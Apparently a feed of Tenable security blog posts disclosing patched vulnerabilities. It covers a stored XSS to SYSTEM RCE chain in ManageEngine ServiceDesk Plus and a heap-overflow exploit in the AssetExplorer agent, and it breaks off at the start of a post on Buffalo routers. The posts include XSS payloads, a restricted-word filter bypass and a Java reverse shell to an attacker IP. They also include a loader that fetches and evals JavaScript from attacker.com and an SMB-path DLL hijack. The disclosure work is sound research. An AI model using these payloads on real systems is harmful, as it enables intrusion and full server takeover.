
Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

17 August 2021 at 13:02

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. It reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements, and more than likely, the listed products are commonly found in target environments. To a 0-day bug hunter, this screams, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For the server-side bugs, stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, and other devices would likely be provisioned by IT and managed in service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.
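Submitting an asset can be sketched with a short Node client. This is hypothetical tooling, not the original PoC: the host is a placeholder and the XML body is abridged — only the endpoint path comes from the text above.

```javascript
// Minimal sketch (Node 18+): POST an asset-definition XML to the
// unauthenticated discovery endpoint.
const assetXml = `<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
</DocRoot>`; // asset details elided; see TRA-2021-11 for a full PoC

async function uploadAsset(host, xml) {
  const res = await fetch(`http://${host}/discoveryServlet/WsDiscoveryServlet`, {
    method: "POST",
    headers: { "Content-Type": "text/xml" },
    body: xml,
  });
  return res.status;
}

// Example (placeholder host):
// uploadAsset("172.26.31.177:8080", assetXml).then(console.log);
```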

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found in our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear that a stored cross-site scripting vulnerability exists here, and we’ve assigned it CVE-2021–20080. The root cause is that the IP address is used to construct a JavaScript function without sanitization, which allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close
sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, the CSRF cookies are set without the HttpOnly flag. Because of this, our malicious JavaScript can harvest the CSRF token value and supply the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.
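Concretely, the payload logic might look like this. This is a sketch assuming only the cookie and header names shown above; the deleteUser helper and the user id are illustrative, not the actual PoC payload.

```javascript
// The sdpcsrfcookie is NOT HttpOnly, so the injected script can read it.
function extractCsrfToken(cookieString) {
  const match = cookieString.match(/(?:^|;\s*)sdpcsrfcookie=([^;]+)/);
  return match ? match[1] : null;
}

// Illustrative: fire the DELETE request shown earlier from the victim's
// browser. The HttpOnly session cookies ride along automatically.
function deleteUser(id) {
  const token = extractCsrfToken(document.cookie);
  const req = new XMLHttpRequest();
  req.open("DELETE", "/api/v3/users?ids=" + id);
  req.setRequestHeader("X-ZCSRF-TOKEN", "sdpcsrfparam=" + token);
  req.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  req.setRequestHeader("Content-Type",
    "application/x-www-form-urlencoded; charset=UTF-8");
  req.send("sdpcsrfparam=" + token + "&SUBREQUEST=XMLHTTP");
}
```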

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify “AN IP” (which contains a space) as the IP address:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above I have pasted a screenshot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
    String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
    return restrictedWords.split(",");
}

public Set containsScriptRestrictedWords(String input) throws Exception {
    HashSet<String> input_words = new HashSet<String>();
    input_words.addAll(Arrays.asList(input.split(" ")));
    input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
    return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"
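To see why the comma trick slips through, the filter can be re-expressed in JavaScript. This mirrors the containsScriptRestrictedWords logic above (with an abridged word list): the input is split on spaces only, so "echo,testing" never equals "echo".

```javascript
// Abridged version of the Restricted_Words list from servicedesk.xml.
const restrictedWords = ["outfile", "Out-File", "write", "echo", "move", "del", "rm"];

// Same logic as the Java code: split on spaces, intersect with the list.
function containsScriptRestrictedWords(input) {
  const words = new Set(input.split(" "));
  return restrictedWords.filter((w) => words.has(w));
}

console.log(containsScriptRestrictedWords("cmd /c echo testing > C:\\test.txt"));
// → [ 'echo' ]  (blocked)
console.log(containsScriptRestrictedWords('cmd /c "echo,testing > C:\\test.txt"'));
// → []  (bypasses the filter)
```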

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges, as Sysinternals Process Monitor confirms:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention: a maximum length was enforced on the injected payload. Due to the length of a reverse shell payload, this restriction forced me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
  eval(this.responseText);
}

var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET", "http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. His vulnerability would allow an attacker to pivot from SDP to the agents. As you might imagine, this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.


Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

17 August 2021 at 13:02


A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server/agent model in which agents provide updates on machine status back to the ManageEngine server. Chris ended up finding an unauthenticated XSS-to-RCE chain in the server component, allowing an attacker to fully compromise the server with SYSTEM privileges. You can read about it here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444.

This blog will go over the exploitation of an integer overflow (CVE-2021–20082) that I found in the agent itself, the Asset Explorer Agent. This exploit could allow an attacker to pivot through the network once the ManageEngine server is compromised. Alternatively, it could be exploited by spoofing the ManageEngine server IP on the network and triggering the vulnerability, as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase the odds of exploitation.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command, however, the agent expects to receive an authtoken, which it echoes back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem: that configured IP address is not ours, so the agent asks the real ManageEngine server to approve our authtoken, which is always going to be denied.

There is a way an attacker can exploit this design, however: by spoofing their IP on the network to be the ManageEngine server. As I mentioned, certificates are not validated, which allows an attacker to send and receive requests without an issue. This gives full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of these is HttpQueryInfoW, which is used to query the incoming POST request for its Content-Length field. This Content-Length is then used as a size parameter to allocate memory on the heap, into which the POST payload data is copied.

There is some integer arithmetic performed between receiving the Content-Length field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Length is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Length of UINT32_MAX/4, the integer wraps back around to 2 by the time it is passed to calloc. Once this allocation of only two bytes is made on the heap, the following API, InternetReadFile, will copy our POST payload data into the destination buffer until all of the POST data has been read. If our POST data is larger than two bytes, that data will be copied beyond the two-byte buffer, resulting in a heap overflow.
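The wraparound can be sketched numerically. This is a simulation of the size arithmetic, not the agent's code; `>>> 0` stands in for 32-bit unsigned truncation.

```javascript
// (len + 1) * 4 + 2, reduced modulo 2^32 as 32-bit unsigned math would be.
function allocSize(contentLength) {
  return (((contentLength + 1) * 4) + 2) >>> 0;
}

// An honest size behaves normally…
console.log(allocSize(100));        // → 406
// …but UINT32_MAX/4 wraps (0x3FFFFFFF + 1) * 4 around to 0, leaving 2.
console.log(allocSize(0x3FFFFFFF)); // → 2
```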

Things are looking really good here because we can not only control the size of the heap overflow (tailoring our POST data size to overwrite whatever amount of heap memory we want), but also write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader’s *prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the _CrtMemBlockHeader* next pointer will be written to wherever *prev points. It gets better: we can overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what *next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory of the remote Asset Explorer service, which is exactly what I aim for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can point this current working directory at a remote SMB share we own, and place a malicious .bat file with the same name on our share, then Asset Explorer will try to execute the .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this would ideally require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately, my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process, and in large part to my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts, since I am only overwriting the linked list pointers of heap cells, and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found that ~20 attempts of this overflow will usually end up overflowing the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC, I initially send the following string to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell header for the “XXXXXXXX2” string, with the understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory pointer, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* next pointer, then we won’t need an info leak. Since the upper three bytes already dictate the SMB string’s general memory address, we just need to offset the last byte so that it points to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I chose to overwrite the lowest order byte with “0xf8”, to guarantee the maximum offset from the _CrtMemBlockHeader.
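The partial overwrite can be sketched numerically. The addresses here are hypothetical; the point is that the allocator already wrote the upper three bytes of the pointer for us, and the overflow replaces only the lowest byte.

```javascript
// Keep the upper three bytes of the existing heap pointer, replace only
// the lowest byte (0xf8 in the exploit) to slide past the header into
// the string data.
function patchLowByte(ptr, byte) {
  return ((ptr & 0xffffff00) | byte) >>> 0;
}

const headerPtr = 0x00a341c0; // hypothetical _CrtMemBlockHeader* value
console.log(patchLowByte(headerPtr, 0xf8).toString(16)); // → "a341f8"
```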

It’s beneficial if we can craft an SMB path string with prepended nonsense characters (similar to a nop sled, but for a file path). This gives us a greater probability that our 0xf8 offset points somewhere in the SMB path string that SetCurrentDirectory can still interpret as a valid path with prepended nonsense characters (i.e.: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for an SMB share, so thanks go to Chris Lyne, who was able to craft a nicely padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *next byte with 0xf8. Much better odds than if I used a simple, straightforward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I searched for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic library load (not super common for applications to do) that I can trigger, and it cannot be a known dll (i.e.: kernel32.dll, rpcrt4.dll, etc.), since the search order for known dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. So I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent that will attempt to dynamically load “Mspdb80.dll”, a debugging DLL used for RTC (runtime checks). This is an unknown DLL, so the agent should attempt to load it from its current working directory. OK, so how do I call this thing?

Well, you can’t… I couldn’t find any xrefs to code flow that could end up calling this function; I couldn’t even find indirect calls that might lead code flow there, so I assume it was left in as a compiler stub. I had to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, which means I can’t write the GetPdbDll function address as a return address on stack memory, nor can I overwrite a function pointer with it. There was one place, however, where I saw a pointer TO a function pointer being called, and that is something I can abuse. It’s in the _CrtDbgReport function, which allows the Microsoft runtime to alert in the event of various integrity violations, one of which is a failure of the heap integrity check. When using a debug heap (as in this scenario) it can be triggered if unwritten portions of heap memory do not contain “0xfd” bytes, since those are supposed to represent “dead-land-fill” (this is why my PoC mimics these 0xfd bytes during the heap overflow, to keep this check happy). This time, however, we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook, if the application has one registered. This application does not have one registered, but we can leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in the .data section too!). This is also great because it doesn’t have to be a pointer to executable memory (which we can’t write): _pfnReportHook holds a pointer TO a function pointer, a big beneficial difference for us. We just need to register our own _pfnReportHook that points at the function pointer for the function that loads “Mspdb80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook, which should load and execute “Mspdb80.dll” off our remote SMB share.

We have to be clever with our second write primitive, as we can no longer borrow the earlier technique of using subsequent heap cell allocations to bypass the infoleak. That scenario was unique to unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I chose to overwrite the _pfnReportHook variable with a random offset into my heap (again, no infoleak required; this is similar to the earlier partial pointer overwrite, but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again to clobber an enormous portion of the heap with repeating function pointers to the GetPdbDll function.

Yes, this will certainly crash the program, but that’s OK! We are at the finish line, and this severe heap corruption will trigger a call to our _pfnReportHook before the crash happens. Thanks to the earlier overwrite, our _pfnReportHook pointer should point to some random address in the heap, which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC on Tenable’s PoC GitHub: https://github.com/tenable/poc. ManageEngine has since patched this issue. For more details, you can check out the advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo

3 August 2021 at 13:03

A while back I was browsing Amazon Japan for their best selling networking equipment/routers (as one does). I had never taken apart or hunted for vulnerabilities in a router and was interested in taking a crack at it. I came across the Buffalo WSR-2533DHP3 which was, at the time, the third best selling device on the list. Unfortunately, the sellers didn’t ship to Canada, so I instead bought the closely related Buffalo WSR-2533DHPL2 (though I eventually got my hands on the WSR-2533DHP3 as well).

In the following sections we will look at how I took the Buffalo devices apart, did a not-so-great solder job, and used a shell offered up on UART to help find a couple of bugs that could let users bypass authentication to the web interface and enable a root BusyBox shell on telnet.

